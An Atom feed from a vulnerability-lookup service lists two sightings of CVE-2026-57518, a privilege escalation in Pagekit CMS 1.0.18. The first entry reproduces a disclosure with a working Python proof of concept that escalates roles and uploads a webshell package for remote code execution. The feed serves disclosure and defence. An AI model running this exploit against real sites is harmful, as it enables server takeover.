<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://vulnerability.circl.lu/sightings/feed</id>
  <title>Most recent sightings.</title>
  <updated>2026-06-27T22:45:51.006592+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>info@circl.lu</email>
  </author>
  <link href="https://vulnerability.circl.lu" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the 10 most recent sightings.</subtitle>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/c6180f0a-7d6d-4502-be1f-9008a576e728/export</id>
    <title>c6180f0a-7d6d-4502-be1f-9008a576e728</title>
    <updated>2026-06-27T22:45:51.032560+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "c6180f0a-7d6d-4502-be1f-9008a576e728", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-57518", "type": "seen", "source": "https://gist.github.com/sermikr0/6f0a67e9d101746fcdb04827de137847", "content": "\n# CVE-2026-57518 \u2014 Pagekit CMS 1.0.18 Privilege Escalation \u2192 RCE\n\n**CVE:** CVE-2026-57518  \n**Product:** Pagekit CMS 1.0.18 (https://github.com/pagekit/pagekit)  \n**CVSS 3.1:** 8.8 HIGH \u2014 `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`  \n**CWE:** CWE-269 Improper Privilege Management  \n**Reporter:** Saidakbarxon Maqsudxonov / saidakbarxonmaqsudxonov4@gmail.com  \n**Date:** 2026-06-26  \n\n---\n\n## Summary\n\n`UserApiController::saveAction()` only checks for assignment of `Role::ROLE_ADMINISTRATOR` (hard-coded ID=3). Custom roles with elevated permissions (e.g., `system: manage packages`) can be freely assigned by any user holding `user: manage users` permission, enabling privilege escalation to Remote Code Execution via the package installer.\n\n---\n\n## Root Cause\n\n**File:** `app/system/modules/user/src/Controller/UserApiController.php` lines 178\u2013188\n\n```php\n$key    = array_search(Role::ROLE_ADMINISTRATOR, @$data['roles'] ?: []);\n$add    = false !== $key &amp;amp;&amp;amp; !$user-&amp;gt;isAdministrator();\n$remove = false === $key &amp;amp;&amp;amp; $user-&amp;gt;isAdministrator();\n\nif (($self &amp;amp;&amp;amp; $remove) || !App::user()-&amp;gt;isAdministrator() &amp;amp;&amp;amp; ($remove || $add)) {\n    App::abort(403, 'Cannot add/remove Admin Role.');\n}\n\n$user-&amp;gt;save($data); // saves ALL roles including unchecked custom ones\n```\n\n`Role::ROLE_ADMINISTRATOR = 3` (hard-coded in `Role.php`).\n\nAny role with ID \u2260 3 (custom roles: ID 4, 5, 6\u2026) passes through without restriction.\n\n## Attack Chain\n\n1. Attacker has account with `user: manage users` permission\n2. Send `POST /api/user/{attacker_id}` with `\"roles\": [2, 5]` \u2014 role 5 is a custom role with `system: manage packages`\n3. Attacker now holds `system: manage packages`\n4. `POST /admin/api/package/upload` \u2014 upload malicious ZIP containing PHP webshell\n5. `POST /admin/api/package/install` \u2014 install package\n6. Access `http://target/packages/malicious/index.php?cmd=id` \u2192 RCE\n\n## Proof of Concept\n\n```python\nimport requests, re, zipfile, io\n\nBASE = \"https://target.com\"\nsess = requests.Session()\n\n# 1. Login as low-priv user with \"user: manage users\"\nr = sess.post(f\"{BASE}/api/user/login\",\n    json={\"username\": \"editor\", \"password\": \"password\"})\ncsrf = re.search(r'\"csrf\"\\s*:\\s*\"([^\"]+)\"', r.text).group(1)\n\n# 2. Escalate to role ID=5 (has \"system: manage packages\")\nmy_id = sess.get(f\"{BASE}/api/users/me\").json()[\"id\"]\nsess.post(f\"{BASE}/api/user/{my_id}\",\n    json={\"user\": {\"id\": my_id, \"roles\": [2, 5]}},\n    headers={\"X-CSRF-Token\": csrf})\n\n# 3. Upload malicious ZIP \u2192 RCE\nbuf = io.BytesIO()\nwith zipfile.ZipFile(buf, \"w\") as z:\n    z.writestr(\"shell/index.php\", '')\n    z.writestr(\"shell/composer.json\", '{\"name\":\"shell\",\"version\":\"1.0.0\"}')\nbuf.seek(0)\nsess.post(f\"{BASE}/admin/api/package/upload?type=extension\",\n    files={\"file\": (\"shell.zip\", buf, \"application/zip\")},\n    headers={\"X-CSRF-Token\": csrf})\n\nprint(f\"RCE: {BASE}/packages/shell/index.php?cmd=id\")\n```\n\n## Impact\n\nFull server compromise on any Pagekit installation that delegates `user: manage users` to non-owner accounts.\n\n## Mitigation\n\nProject is unmaintained (last commit 2018, archived 2023). Restrict `user: manage users` to fully-trusted administrators only, or migrate to a maintained CMS.", "creation_timestamp": "2026-06-26T15:47:53.100198Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/c6180f0a-7d6d-4502-be1f-9008a576e728/export"/>
    <published>2026-06-26T15:47:53.100198+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/2df44e3e-8cbc-40ad-b26f-b05305101080/export</id>
    <title>2df44e3e-8cbc-40ad-b26f-b05305101080</title>
    <updated>2026-06-27T22:45:51.028801+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "2df44e3e-8cbc-40ad-b26f-b05305101080", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-57518", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mp7qcdhtpc2c", "content": "CVE-2026-57518 - Pagekit CMS 1.0.18 Privilege Escalation via UserApiController\nCVE ID : CVE-2026-57518\n \n Published : June 26, 2026, 3:58 p.m. | 3\u00a0hours, 13\u00a0minutes ago\n \n Description : Pagekit CMS 1.0.18 contains a privilege escalation vulnerability that allows authenticated ...", "creation_timestamp": "2026-06-26T20:00:48.653426Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/2df44e3e-8cbc-40ad-b26f-b05305101080/export"/>
    <published>2026-06-26T20:00:48.653426+00:00</published>
  </entry>
</feed>
